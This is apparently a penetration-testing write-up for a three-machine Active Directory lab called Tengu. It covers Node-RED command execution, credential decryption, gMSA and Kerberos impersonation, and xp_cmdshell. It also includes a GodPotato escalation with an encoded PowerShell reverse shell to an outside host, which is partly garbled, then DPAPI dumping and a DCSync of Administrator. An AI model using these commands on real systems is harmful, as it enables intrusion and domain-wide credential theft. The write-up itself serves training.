Tengu (Chain)

Machine information

Operating System: Windows

Chain: True (3 Machine)

Credentials

Username	Password	Method	Scope
nodered_connector	DreamPuppyOverall25	Decrypted from flows_cred.json	MSSQL
t2_m.winters	Tengu123	Extracted from database	Domain User

✅ Valid Usernames

nodered_connector

🔑 Passwords list

Tengu123

Information Gathering

10.10.229.53
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
#10.10.229.54
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
#10.10.229.55
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
1880/tcp open  vsat-control

Service Enumeration

Discovering Node RED

Node-RED is a visual programming tool, built on Node.js, that allows users to create applications that collect, transform, and visualize data. It enables users to connect hardware devices, APIs, and online services without writing any code. This makes it a valuable tool for rapid development in areas like the Internet of Things (IoT) and industrial control systems.

Compromise nodered server

Initial Enumeration

The tester was able to compromise the server using the following work flow.

1. Inject block

2. Command Block

3. Debug block

Lateral movement to t2_m.winters

Decrypting credentials

During the enumeration the tester found the next article: how-to-decrypt-flows_cred-json-from-nodered-data and was used to decrypt flow_cred.json file.

nodered_svc@nodered:~/.node-red$ find / -name "flows_cred.json" 2>/dev/null
/opt/nodered/.node-red/flows_cred.json
/home/nodered_svc/.node-red/flows_cred.json

❯ ./decrypt.sh .node-red | xargs echo
{d237b4c16a396b9e:{username:nodered_connector,password:DreamPuppyOverall25}}

Setting up a tunneling

Extracting User credentials into database

Connecting to MSSQL using impacket toolkit

❯ proxychains impacket-mssqlclient sql.tengu.vl/nodered_connector:'DreamPuppyOverall25'@10.10.148.22 2>/dev/null

SQL (nodered_connector  nodered_connector@Demo)> SELECT * FROM Demo.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
Demo            dbo            Users        b'BASE TABLE'   

SQL (nodered_connector  nodered_connector@Demo)> select * from Users;
  ID   Username          Password                                                              
----   ---------------   -------------------------------------------------------------------   
NULL   b't2_m.winters'   b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'   

SQL (nodered_connector  nodered_connector@Demo)> 

Privilege Escalation to root

nodered_svc@nodered:/opt/nodered$ su t2_m.winters@tengu.vl
Password: 

t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo -l
[sudo] password for t2_m.winters@tengu.vl: 
Matching Defaults entries for t2_m.winters@tengu.vl on nodered:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User t2_m.winters@tengu.vl may run the following commands on nodered:
    (ALL : ALL) ALL

t2_m.winters@tengu.vl@nodered:/opt/nodered$ sudo su
root@nodered:/opt/nodered# 

Extracting nodered NT Hash

root@nodered:~# python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : TENGU.VL
	SERVICE PRINCIPAL : NODERED$/
	NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
	AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
	AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
root@nodered:~# 

Compromising SQL machine

Initial Foothold

#Using NetExec
❯ proxychains nxc ldap 10.10.148.21 -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
LDAPS       10.10.148.21    636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       10.10.148.21    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.148.21    636    DC               Account: gMSA01$              NTLM: dc1d9dcba717b640f1d4ef66294b0790
LDAPS       10.10.148.21    636    DC               Account: gMSA02$              NTLM: 

#Using bloodyAD 
❯ proxychains bloodyAD --host dc.tengu.vl -d tengu.vl -u 'NODERED$' -p :d4210ee2db0c03aa3611c9ef8a4dbf49 get object 'gMSA01$' --attr msDS-ManagedPassword 2>/dev/null

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=tengu,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:dc1d9dcba717b640f1d4ef66294b0790
msDS-ManagedPassword.B64ENCODED: Xa2PeJhpM9WJnpyqIoXMnx5z+2N57I+9lVX8fQA7o0KJUMPmFPGwLs1VGB++HezeVyyc6Eb5WVZOiZ0oCrRy5dlwmrF9lHlcV6nwZcABJhfBUsjBK8WL2/kxHoCC5SJXdykYPbmF+ESpaY68tYteAzqGgrDri4ghAjVIt35xZPKXfvxLtpkp8LbLsj9+siTwKeQ/7vjPOQZ76NJgN1oSAq4Kv6tNNVCaF2MoVTcBi/1djo/J9+b66g6uCg/WdsOQgEBNcJnX4yIU1qbh0EOhN6bpA6VXHW25/ppNkTnXiBteFKdOl+9bxUFcOIre8cFGHd/XtSZTa5GwUiO8kMcFcw==

Impersonating User account

After compromising the GMSA01$ account, the tester proceeded to enumerate the Protected Users group and discovered that both the Administrator and TX_C.FOWLER users belong to this group.

However, the user T1_M.WINTERS does not belong to the Protected Users group but is a member of the SQL_ADMINS group.

❯ proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl:1433' -impersonate 't1_M.WINTERS' -hashes :dc1d9dcba717b640f1d4ef66294b0790 'tengu.vl/gMSA01$' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating t1_M.WINTERS
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache
❯ export KRB5CCNAME='t1_M.WINTERS@MSSQLSvc_sql.tengu.vl:1433@TENGU.VL.ccache'

Connecting and enable XP_CMDShell

❯ proxychains impacket-mssqlclient -k -no-pass sql.tengu.vl
SQL (TENGU\t1_m.winters  dbo@master)> enable_xp_cmdshell
INFO(SQL): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(SQL): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Gaining Shell into SQL.Tengu.vl using hoaxshell

Tool: hoaxshell

Privilege Escalation to NT Authority System

Abusing SeImpersonatePrivilege

The tester setting up a SMB Folder sharing GodPotato-NET4.exe and sent a reverse shell to gain access as NT Authority System.

PS C:\Windows\system32 > \\10.8.5.48\smbfolder\GodPotato-NET4.exe -Cmd 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADUALgA0ADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAAPS C:\Windows\system32 > \\10.8.5.48\smbfolder\GodPotato-NET4.exe -Cmd 'cmd /c powershell -e <base64>'

Listing Stored Credentials

PS C:\> cmdkey /list

Currently stored credentials:

    Target: Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    Type: Domain Password
    User: TENGU\T0_c.fowler
    Local machine persistence
    
PS C:\> 

Compromising Tengu.vl Domain Controller

Dumping DPAPI credentials .

Tool: SharpDPAPI.exe

PS C:\Temp> .\SharpDPAPI.exe machinecredentials

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : UntrimmedDisplaceModify25

PS C:\Temp> 

Bypassing Status account Restrinction

The tester was able to bypass STATUS_ACCOUNT_RESTRICTION using Kerberos authentication.

❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
SMB         10.10.148.21    445    DC               [-] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 STATUS_ACCOUNT_RESTRICTION 
❯ proxychains nxc smb 10.10.148.21 -u 'T0_c.fowler' -p 'UntrimmedDisplaceModify25' -k 2>/dev/null
SMB         10.10.148.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
SMB         10.10.148.21    445    DC               [+] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 (Pwn3d!)

Requesting Ticket Granting ticket for Kerberos

❯ proxychains impacket-getTGT tengu.vl/'T0_c.fowler':'UntrimmedDisplaceModify25' -k 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in T0_c.fowler.ccache
❯ export KRB5CCNAME='T0_c.fowler.ccache'

Performing DCSync Attack using Kerberos

❯ proxychains impacket-secretsdump -k -no-pass dc.tengu.vl -just-dc-user Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38c77bef855fd6896bc28c9429e18cfd:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2962482a8268521e3a583150d79b51474b07a0d237216b7c15da26b4cb0d3807
Administrator:aes128-cts-hmac-sha1-96:360c06cc8bed5a43e08afe83c3797b2a
Administrator:des-cbc-md5:3e5816ceea8feaa4

Requesting a TGT as Administrator on DC.Tengu.vl

❯ proxychains impacket-getTGT tengu.vl/Administrator -hashes :38c77bef855fd6896bc28c9429e18cfd 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache
❯ export KRB5CCNAME='Administrator.ccache'

Gaining Shell as Administrator on DC.Tengu.vl

❯ proxychains impacket-wmiexec -k -no-pass dc.tengu.vl 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
tengu\administrator

C:\>